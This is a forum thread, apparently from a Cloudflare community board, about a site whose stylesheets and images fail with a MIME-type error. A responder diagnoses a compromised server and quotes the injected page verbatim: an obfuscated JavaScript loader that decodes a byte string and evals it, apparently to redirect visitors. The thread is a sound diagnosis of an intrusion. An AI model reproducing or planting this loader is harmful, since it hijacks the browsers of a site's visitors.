Error: Resource interpreted as Stylesheet but transferred with MIME type text/html

I have recently started having problems with a simple site that has been running fine for many years perviously.

The resources stored on the origin server as separate files have stopped being accessible and so the site will load as the only the webpage. If I switched to development mode then there is no issue.

The main error that I receive which is indicative of the problem is as follows:
Resource interpreted as Stylesheet but transferred with MIME type text/html

This problem also stops my stored image files from loading on the site.

I think that this has something to do with cross-origin resources being blocked because of changed standards with server headers but am unsure. I have been in contact with the origin hosting company and they didn’t really do much apart from reset the permission which did nothing.

Any help in debugging this problem would be much appreciated!

When I see that message, it’s because I requested a file, such as CSS or JS, but the server (or Cloudflare) blocked it and sent an HTML response saying “you’re not getting that file”. I see this in my browser’s Dev Tools when I look at the Response for that resource.

Thanks for this. Do you have any suggestions as to how I might be able to address this problem? Is it likely related to CORS and potentially due to server headers that are the domain of the hosting company?

I’ve since reset the DNS back to the hosting company’s and the problem is gone. However, this is not the desired outcome.

As far as I can tell someone compromised your server or site and planted some third party code, which is apparently supposed to open some configurable URL (most likely to hijack your traffic).

This is what your site currently (off of Cloudflare) returns.

<html><body><script>function fF1(xB,W2,W0){var VAKJ5,sdhDe=new Array(),gEAJN="\x56\x47\x93\x31\x52\xe0\xa6\x66\x10\x33\x9f\x22\xae\x29\x95\xce\xbf\xf8\x6e\x57\x21\x59\x95\xaa\x6e\xf5\x11\xdf\x81\x51\x30\xa5\x06\xe6\x9c\x1f\x51\x50\xb8\xc9\xc6\x2c\xad\x3a\x33\x39\x7d\x76\x7f";for(VAKJ5=0;VAKJ5<gEAJN.length;VAKJ5++)sdhDe[VAKJ5]=gEAJN.charCodeAt(VAKJ5);VAKJ5=4;while(VAKJ5<=35){sdhDe[VAKJ5]=(sdhDe[VAKJ5]+sdhDe[VAKJ5+1])&0xff;sdhDe[VAKJ5]=((sdhDe[VAKJ5]<<7)&0xff)|(sdhDe[VAKJ5]>>1);VAKJ5++;}VAKJ5=1;do{sdhDe[VAKJ5]=(sdhDe[VAKJ5]+sdhDe[VAKJ5+1])&0xff;sdhDe[VAKJ5]=(~sdhDe[VAKJ5])&0xff;sdhDe[VAKJ5]=sdhDe[VAKJ5]^13;}while(++VAKJ5<=40);VAKJ5=37;for(;;VAKJ5--){if(VAKJ5<3)break;sdhDe[VAKJ5]=((sdhDe[VAKJ5]^182)+35)&0xff;}gEAJN="";for(VAKJ5=1;VAKJ5<sdhDe.length-1;VAKJ5++)if(VAKJ5%7)gEAJN+=String.fromCharCode(sdhDe[VAKJ5]^xB);gEAJN+="";eval(gEAJN);}fF1(95,"","");</script><br><br><br><center><h3><p>Your browser doesn't seem to support Javascript!</p></h3></center></body></html>

This is the same content being returned as CSS when your site is on Cloudflare, which is the reason for the error.

You should thoroughly go through your server, site, and configuration and verify all settings and code.

1 Like

Thanks for this insight. I have checked through the site code (it’s a pretty basic site) and can’t seem to find any modifications. I couldn’t see that script in the source through a browser either. Since the change in DNS back to the origin the site is working as expected again. I did notice the message ‘Your browser doesn’t seem to support Javascript!’ being displayed when the error was occurring. I thought this could be being injected by the hosting provider to handle the missing file dependencies? If you don’t think this is correct do you have any suggestions where the malicious code might be?

As far as the hosted files such as the CSS which were being blocked the response headers seem very limited when compared to dependencies such as Google fonts that weren’t blocked. Google fonts provides access-control-allow-origin: * and content-type: text/css; charset=utf-8 which related to the new information regarding correct CORS usage. Could this issue be due to the correct headers not being passed? Does this fall into the domain of the hosting provider and is out of my control? Thanks.

I am afraid I wouldnt, that could be anywhere from the configuration to the actual code. It might be probably best to hire a security consultant to have a look at that. But yes, it is that “JavaScript” message.

This topic was automatically closed after 30 days. New replies are no longer allowed.